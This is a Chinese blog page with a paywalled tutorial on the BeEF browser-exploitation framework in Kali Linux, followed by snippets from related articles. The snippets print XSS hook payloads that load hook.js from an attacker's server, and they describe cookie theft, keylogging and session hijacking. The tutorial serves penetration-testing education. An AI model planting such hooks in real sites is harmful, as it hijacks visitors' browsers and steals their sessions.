网安工具系列:kali之beef的基础使用

最新推荐文章于 2025-06-19 16:49:43 发布
最新推荐文章于 2025-06-19 16:49:43 发布
阅读量1.2k 收藏
点赞数 34
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 状态模式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/137475149
网络安全 专栏收录该内容
219 篇文章 ¥299.90 ¥399.90
订阅专栏
本文介绍了Kali Linux下BeEF框架的基本使用,包括BeEF的介绍、安装与配置,以及如何通过BeEF获取cookie、实现网页重定向、弹出社工窗口等实际操作。BeEF是一个用于安全测试的工具,可以控制目标浏览器并进行多种渗透测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali之beef的使用



kali之beef的使用

一、beef介绍

BeeF是前欧美最流行的web框架攻击平台kali早期版本会集成Beef,而且Beef有很多好用的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。

beef也是属于c/s结构,具体看图

在这里插入图片描述

zombie(僵尸)即受害的浏览器。zombie是被hook(勾连)的,如果浏览器访问了有勾子(由js编 写)的页面,就会被hook,勾连的浏览器会执行初始代码返回一些信息,接着zombie会每隔一段时间 (默认为

了解本专栏 订阅专栏 解锁全文
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 790
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
网络安全系列&网安知识系列:[译] 渗透测试实战第三版(红队版)
weixin_54626591的博客
10-17 457
[译] 渗透测试实战第三版(红队版)
KaliBeef使用教程
weixin_43287317的博客
04-02 5567
KaliBeef使用教程
kali beef使用
pigzlfa的博客
07-05 492
beef的安装 可以直接安装也可以从源码安装,略 beef安装好后,打开web登陆页面 http://192.168.102.130:3000/ui/panel url为kali机地址,可以从配置文件中修改 3.把js加载进存在xss的地方(例pikachu) payload: <script src='http://192.168.102.130:3000/hook.js'></script> 可以看到在不停的向102.130发起请求 使用beef中终端发送弹窗 .
Kali Linux 网络扫描秘籍第二版(三)
最新发布
龙哥盟
06-19 932
在前面的示例中,我们看到 Sparta 开箱即用的功能。Sparta 的一个很棒的功能是可以添加其他工具。这些工具可以出现在上下文菜单中,结果可以在 Sparta 界面中汇总。在本示例中,我们将介绍如何自定义集成一个新工具。Kali Linux 渗透测试平台提供了大量高效工具,以完成企业渗透测试中常见的任务。然而,也有一些情况下,单一工具不足以完成某项任务。在这种情况下,通常比完全编写新的脚本或程序来完成任务更有效的是,编写利用现有工具的脚本,或根据需要修改它们的行为。
kalibeef使用
whoim_i的博客
11-03 2万+
目录一、beef介绍二、kali使用beef配置beef实际操作 一、beef介绍 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。...
kali工具之Beef
wulanlin的博客
12-27 603
*本工具仅供技术分享、交流讨论,严禁用于非法用途。 简介 Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单 主要功能 信息收集: 1.网络发现 2.主机信息 3.Cookie获取 4.会话劫持 5.键盘记录 6.插件信息 持久化控制: 1.确认弹框 2.小窗口 3.中间人 社会工程: 1
beef的简单使用
weixin_44940180的博客
07-23 3703
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器) Beef一般和
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 1896
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2663
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
【网络安全】红队渗透项目之Stapler1(上)
2401_84208172的博客
05-28 734
由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:image.png发现本kali ip为40段!image.png发现项目IP为152!image.pngimage.png以及smb2(windows445端口,共享用)利用!可以看到有很多容易受到攻击的端口都开着,FTP、NetBIOS、MySQL和运行Web服务器(Apache HTTPD)的端口12380等等!
Kali使用beef
路~可以走过
06-04 6055
1.使用beef 2. 出现了要修改密码的路径,才能使用 2-1.修改beef用户的默认密码,修改密码为qwe123456 root@kali:~# vi /etc/beef-xss/config.yaml 3.退出终端,再次点击beef ,启动终端 4.登录web的beef 4-1.输入beef用户和修改的密码即可登录 5.查看xss的脚本 ...
Kali BeEF-XSS使用
nlj1860453的博客
01-08 623
kali终端输入“beef-xss”,显示没有安装。回车它会提示是否安装,输入y,等待安装完毕。
Beef工具使用
wo41ge的博客
02-22 2万+
今天写一下这个工具Beef 我这里用kali 启动Apache:service apache2 start 然后安装Beef工具 我用脚本安装 命令: apt-get update apt-get install beef-xss apt-get install beef-xss beef-xss 启动之后 Hook: <script src="http://<IP>:3000/hook.js"></script> 会弹出来beef的登录窗口 这边我们在看一下bee
KALI LINUX WEB 渗透测试视频教程—第16课 BEEF基本使用
weixin_30904593的博客
12-23 239
Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用 文/玄魂 目录 Kali Linux Web 渗透测试视频教程—第16课 BeEF基本使用....................... 1 BeEF......................................................................
xss利用之kali神器beef
热门推荐
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEFKali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
BEEF基础使用
课嗨教育的专栏
09-07 398
BeEF,全称 The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。
kalibeef的安装
hjhwdwdw的博客
12-23 1038
接着输入beef-xss打开beef,会让你输入新的密码,账号密码初始默认都为beef(输入密码的时候不可见)安装beef输入以下命令。修改密码后会自动登录。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值